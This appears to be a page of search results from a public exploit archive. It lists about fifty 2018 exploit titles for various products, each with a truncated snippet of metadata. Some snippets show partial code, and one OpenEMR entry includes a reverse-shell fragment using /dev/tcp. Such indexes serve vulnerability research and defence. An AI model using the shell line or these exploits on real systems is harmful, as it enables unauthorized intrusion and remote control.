41207 matches found
Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR DEP Bypass)
Foxit Reader 9.0.1.1049 - Buffer Overflow ASLR DEP Bypass %PDF 1 0 obj 2 0 obj /S /JavaScript /JS / Exploit Title: Foxit Reader 9.0.1.1049 - Buffer Overflow ASLRDEP Date: 2018-08-04 Exploit Author: Manoj Ahuje Tested on: Windows 7 Pro x32 Software Link:...
OpenEMR 5.0.1 - (Authenticated) Remote Code Execution
OpenEMR 5.0.1 - Authenticated Remote Code Execution Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example:...
QNap QVR Client 5.0.3.23100 - Denial of Service (PoC)
QNap QVR Client 5.0.3.23100 - Denial of Service PoC Exploit Title : QNap QVR Client 5.0.3.23100 - Denial of Service PoC Discovery by : Rodrigo Eduardo Rodriguez Discovery Date : 2018-08-06 Vendor Homepage: http://www.qnapsecurity.com/n/en/ Software Link :...
Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)
Monstra-Dev 3.0.4 - Cross-Site Request Forgery Account Hijacking Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Request ForgeryAccount Hijacking Date: 2018-08-04 Exploit Author: Nainsi Gupta Vendor Homepage: http://monstra.org/ Product Name: Monstra-dev Version: 3.0.4 Tested on: Windows 10...
AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)
AgataSoft Auto PingMaster 1.5 - Buffer Overflow SEH Exploit Title: AgataSoft Auto PingMaster 1.5 - Buffer Overflow SEH Date: 2018-08-03 Exploit Author: bzyo Twitter: @bzyo Vulnerable Software: AgataSoft Auto PingMaster 1.5 Vendor Homepage: http://agatasoft.com/ Version: 1.5 Software Link :...
Subrion CMS 4.2.1 - Cross-Site Scripting
Subrion CMS 4.2.1 - Cross-Site Scripting Exploit Title: Subrion CMS- 4.2.1 XSS Using component with known Vulnerability Date: 02-08-2018 Exploit Author: Zeel Chavda Vendor Homepage: https://subrion.org/ Software Link: https://subrion.org/download/ Version: 4.2.1 REQUIRED Tested on: Windows,FireFo...
Sitecore.Net 8.1 - Directory Traversal
Sitecore.Net 8.1 - Directory Traversal Exploit Title: Sitecore.Net 8.1 - Directory Traversal Date: 2018-04-23 CVE: CVE-2018-7669 Researcher: Chris Moberly at The Missing Link Security Vendor: Sitecore Version: CMS - 8.1 and up earlier versions untested Authentication required: Yes An issue was...
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)
CloudMe Sync 1.10.9 - Buffer Overflow SEHDEP Bypass Exploit Title: CloudMe Sync 1.10.9 - Buffer Overflow SEHDEP Bypass Date: 2018-08-05 Exploit Author: Manoj Ahuje Linkedin: https://www.linkedin.com/in/manojahuje/ Vendor Homepage: https://www.cloudme.com/ Software Link:...
Wavemaker Studio 6.6 - Server-Side Request Forgery
Wavemaker Studio 6.6 - Server-Side Request Forgery Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery SSRF. Exploit Author: Gionathan "John" Reale Google Dork: N/A Date: 2018-08-01 Vendor Homepage: http://www.wavemaker.com/ Software Link:...
CMS ISWEB 3.5.3 - Directory Traversal
CMS ISWEB 3.5.3 - Directory Traversal Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal Date: 2018-08-01 Exploit Author: Thiago "thxsena" Sena Vendor Homepage: http://www.isweb.it Version: 3.5.3 Tested on: Linux CVE : N/A PoC: CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file...
Open-AudIT Community 2.2.6 - Cross-Site Scripting
Open-AudIT Community 2.2.6 - Cross-Site Scripting Exploit Title: Open-AudIT Community 2.2.6 - Cross-Site Scripting Google Dork:NA Exploit Date: 2018-08-01 Exploit Author: Ranjeet Jaiswal Vendor Homepage: https://opmantek.com/ Software Link:https://opmantek.com/network-tools-download/open-audit/...
LAMS 3.1 - Cross-Site Scripting
LAMS 3.1 - Cross-Site Scripting Exploit Title: LAMS 3.1 - Cross-Site Scripting Date: 2018-08-05 Exploit Author: Nikola Kojic Website: https://ras-it.rs/ Vendor Homepage: https://www.lamsfoundation.org/ Software Link: https://www.lamsfoundation.org/downloadshome.htm Category: Web Application...
onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)
onArcade 2.4.2 - Cross-Site Request Forgery Add Admin Exploit Title: Cross-Site Request Forgery Add Admin Google Dork: Powered by onArcade v2.4.2 Date: 2018/August/4 Author: r3m0t3nu11Zero-way Software Link: "http://www.onarcade.com" Version: "Uptodate" the application is vulnerable to CSRF atta...
Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation
Fortinet FortiClient 5.2.3 Windows 10 x64 Creators - Local Privilege Escalation include "stdafx.h" include include include include pragma comment lib,"psapi" PULONGLONG leakbuffer = PULONGLONGVirtualAllocLPVOID0x000000001a000000, 0x2000, MEMRESERVE | MEMCOMMIT, PAGEREADWRITE; ULONGLONG...
Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection
Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection Issue: Out-of-Band XXE in Vuze Bittorrent Client's SSDP Processing Reserved CVE: CVE-2018-13417 Vulnerability Overview The XML parsing engine for Vuze Bittorrent Client's SSDP/UPNP functionality is vulnerable to an XML...
Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection
Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection Issue: Out-of-Band XXE in Plex Media Server's SSDP Processing Reserved CVE: CVE-2018-13415 Vulnerability Overview The XML parsing engine for Plex Media Server's SSDP/UPNP functionality is vulnerable to an XML External...
Wedding Slideshow Studio 1.36 - Buffer Overflow
Wedding Slideshow Studio 1.36 - Buffer Overflow Exploit Title: Socumsoft Wedding Slideshow Studio 1.36 Date: 02.08.2018 Exploit Author: Achilles Vendor Homepage: http://www.socusoft.com Vulnerable Software: http://www.socusoft.com/down/wedding-slideshow-studio.exe Tested on OS: Windows 7 64-bit D...
cgit 1.2.1 - cgit_clone_objects() Directory Traversal
cgit 1.2.1 - cgitcloneobjects Directory Traversal There is a directory traversal vulnerability in cgitcloneobjects, reachable when the configuration flag enable-http-clone is set to 1 default: void cgitcloneobjectsvoid if !ctx.qry.path cgitprinterrorpage400, "Bad request", "Bad request"; return; ...
PHP Template Store Script 3.0.6 - Cross-Site Scripting
PHP Template Store Script 3.0.6 - Cross-Site Scripting Exploit Title: PHP Template Store Script- 3.0.6 - Stored XSS via Address, Bank Name, and A/c Holder Name Date: 02.08.2018 Site Title : Exclusive Scripts Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...
CoSoSys Endpoint Protector 4.5.0.1 - (Authenticated) Remote Root Command Injection
CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018 Author : 0x09AL Tested on : Endpoint Protector 4.5.0.1 Softwar...
Seq 4.2.476 - Authentication Bypass
Seq 4.2.476 - Authentication Bypass Exploit Title: Seq 4.2.476 - Authentication Bypass Date: 2018-08-02 Exploit Author: Daniel Chactoura Vendor Homepage: https://getseq.net/ Software Link: https://getseq.net/Download/All Version: = 4.2.476 CVE : CVE-2018-8096 Post Reference:...
PageResponse FB Inboxer Add-on 1.2 - search_field SQL Injection
PageResponse FB Inboxer Add-on 1.2 - searchfield SQL Injection Exploit Title: FB Inboxer 1.2 - 'searchfield' SQL Injection Google Dork: N/A Date: 02.08.2018 Exploit Author: Özkan Mustafa Akkuş AkkuS Vendor Homepage:...
TI Online Examination System v2 - Arbitrary File Download
TI Online Examination System v2 - Arbitrary File Download Exploit Title: TI Online Examination System v2 - Arbitrary File Download Dork: N/A Date: 02.08.2018 Exploit Author: Özkan Mustafa Akkuş AkkuS Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904 Version: 2....
AgataSoft Auto PingMaster 1.5 - Host name Denial of Service (PoC)
AgataSoft Auto PingMaster 1.5 - Host name Denial of Service PoC Exploit Title: AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-08-02 Vendor Homepage: http://agatasoft.com/ Software Link : http://agatasoft.com/PingMaster.exe Tested...
Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation
Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation / Exploit Title: Solaris/OpenSolaris AVS kernel code execution Google Dork: if applicable Date: 24/7/2018 Exploit Author: mu-b Vendor Homepage: oracle.com Software Link: Version: Solaris 10, Solaris Sun Opensolaris include include include...
WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)
WityCMS 0.6.2 - Cross-Site Request Forgery Password Change input type="hidden" name="groupe"...
Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection
Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection Issue: Out-of-Band XXE in Universal Media Server's SSDP Processing Reserved CVE: CVE-2018-13416 Vulnerability Overview The XML parsing engine for Universal Media Server's SSDP/UPNP functionality is vulnerable to an XML...
SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)
SecureSphere 12.0.0.50 - SealMode Shell Escape Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "SecureSphere v12.0.0.50 - SealMode Shell Escape root", 'Description' = %q This module...
Imperva SecureSphere 11.5 12.0 13.0 - Privilege Escalation
Imperva SecureSphere 11.5 12.0 13.0 - Privilege Escalation Title: Imperva SecureSphere = v13 - Privilege Escalation Author: 0x09AL Date: 01/08/2018 Tested on: Imperva SecureSphere 11.5,12.0,13.0 Vendor: https://www.imperva.com/ Vulnerability Description There is a program named PCE.py which runs ...
ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution
ASUS DSL-N12EC1 1.1.2.3345 - Remote Command Execution Exploit Title: ASUS DSL-N12EC1 1.1.2.3345 - Remote Command Execution Date: 2018-08-02 Exploit Author: Fakhri Zulkifli @d0lph1n98 Vendor Homepage: https://www.asus.com/ Software Link: https://www.asus.com/Networking/DSLN12EC1/HelpDeskBIOS/...
WebRTC - VP8 Block Decoding Use-After-Free
WebRTC - VP8 Block Decoding Use-After-Free There is a use-after-free in VP8 block decoding in WebRTC. The contents of the freed block are then treated as a pointer, leading to a crash in WebRTC. ==20098==ERROR: AddressSanitizer: heap-use-after-free on address 0x6330000a9491 at pc 0x0000014cde2f bp...
WebRTC - H264 NAL Packet Processing Type Confusion
WebRTC - H264 NAL Packet Processing Type Confusion Type confusion can occur when processing a H264 packet. In the method PacketBuffer::FindFrames in modules/videocoding/packetbuffer.cc there is a loop on line 296 that goes through the databuffer vector backwards. The flag ish264 is set before thi...
Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC)
Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow PoC Exploit Title: Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC Vulnerability Type: SEH Overwrite POC Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovery Date: 2018-08-01 Software Link:...
WebRTC - FEC Processing Overflow
WebRTC - FEC Processing Overflow There are several calls to memcpy that can overflow the destination buffer in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket. The method takes a parameter incomingrtppacket, which is an RTP packet with a mac length that is defined by the transport 2048 bytes for...
LG NAS 3718.510.a0 - Remote Command Execution
LG NAS 3718.510.a0 - Remote Command Execution LG NAS 3718.510.a0 - Remote Command Execution Author: @0x616163 Date: 2018-07-29 Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ CVE: N/A Firmware Version: 3718.510.a0 !/usr/bin/env python import sys impor...
ipPulse 1.92 - Licence Key Denial of Service (PoC)
ipPulse 1.92 - Licence Key Denial of Service PoC Exploit Title: ipPulse 1.92 - 'License Key' Denial of Service PoC Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovery Date: 2018-07-30 Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link:...
Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection
Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection Exploit Title: Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection Date: 2018-07-20 Software Link: https://github.com/nystudio107/craft-seomatic Exploit Author: Sebastian Kriesten 0xB455 Contact:...
Switch Port Mapping Tool 2.81 - SNMP Community Name Denial of Service (PoC)
Switch Port Mapping Tool 2.81 - SNMP Community Name Denial of Service PoC Exploit Title: Switch Port Mapping Tool 2.81 - 'SNMP Community Name' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-07-27 Vendor Homepage: https://switchportmapper.com/ Software Link :...
ipPulse 1.92 - IP AddressHostName-Comment Denial of Service (PoC)
ipPulse 1.92 - IP AddressHostName-Comment Denial of Service PoC Exploit Title: ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-07-27 Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link :...
Responsive Filemanager 9.13.1 - Server-Side Request Forgery
Responsive Filemanager 9.13.1 - Server-Side Request Forgery Exploit Title: Responsive filemanager 9.13.1 - Server-Side Request Forgery Date: 2018-07-29 Exploit Author: GUIA BRAHIM FOUAD Vendor Homepage: http://responsivefilemanager.com/ Software Link:...
H2 Database 1.4.197 - Information Disclosure
H2 Database 1.4.197 - Information Disclosure Exploit Title: H2 Database 1.4.197 - Information Disclosure Date: 2018-07-16 Exploit Author: owodelta Vendor Homepage: www.h2database.com Software Link: http://www.h2database.com/html/download.html Version: all versions Tested on: Linux CVE :...
fusermount - user_allow_other Restriction Bypass and SELinux Label Control
fusermount - userallowother Restriction Bypass and SELinux Label Control / It is possible to bypass fusermount's restrictions on the use of the "allowother" mount option as follows if SELinux is active. Here's a minimal demo, tested on a Debian system with SELinux enabled in permissive mode:...
Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)
Allok MOV Converter 4.6.1217 - Buffer Overflow SEH Exploit Title: Allok MOV Converter 4.6.1217 - Buffer Overflow SEH Date: 2018-07-29 Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Software Link: http://www.alloksoft.com/allokmovconverter.exe Tested Version: 4.6.1217...
Charles Proxy 4.2 - Local Privilege Escalation
Charles Proxy 4.2 - Local Privilege Escalation Charles Proxy is a great mac application for debugging web services and inspecting SSL traffic for any application on your machine. In order to inspect the SSL traffic it needs to configure the system to use a proxy so that it can capture the packets...
Microsoft Windows Kernel - win32k!NtUserConsoleControl Denial of Service (PoC)
Microsoft Windows Kernel - win32k!NtUserConsoleControl Denial of Service PoC / Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service PoC Author: vportal Date: 2018-07-27 Vendor homepage: http://www.microsoft.com Version: Windows 7 x86 Tested on: Windows 7 x86...
NetScanTools Basic Edition 2.5 - Hostname Denial of Service (PoC)
NetScanTools Basic Edition 2.5 - Hostname Denial of Service PoC Exploit Title: NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service PoC Discovery by: Luis Martínez Discovery Date: 2018-07-26 Vendor Homepage: https://www.netscantools.com/ Software Link :...
Online Trade 1 - Information Disclosure
Online Trade 1 - Information Disclosure Exploit Title: Online Trade 1 - Information Disclosure Exploit Author: Dhamotharan Date: 2018-07-17 Vendor Homepage: https://codecanyon.net/item/online-trade-online-forex-and-cryptocurrency-investment-system/21987193?srank=14 CVE : CVE-2018-14328 Version: 1...
Skia - Heap Overflow in SkScan::FillPath due to Precision Error
Skia - Heap Overflow in SkScan::FillPath due to Precision Error There is a heap overflow in Skia when drawing paths with antialiasing turned off. This issue can be triggered in both Google Chrome and Mozilla Firefox by rendering a specially crafted SVG image. PoCs for both browsers are attached...
QNap QVR Client 5.1.1.30070 - Password Denial of Service (PoC)
QNap QVR Client 5.1.1.30070 - Password Denial of Service PoC Exploit Title: QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service PoC Discovery by: Luis Martínez Discovery Date: 2018-07-26 Vendor Homepage: https://www.qnapsecurity.com/n/en/ Software Link :...
SoftNAS Cloud 4.0.3 - OS Command Injection
SoftNAS Cloud 4.0.3 - OS Command Injection Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ SoftNAS Cloud OS Command Injection 1. Advisory Information Title: SoftNAS Cloud OS Command Injection Advisory ID: CORE-2018-0009 Advisory URL:...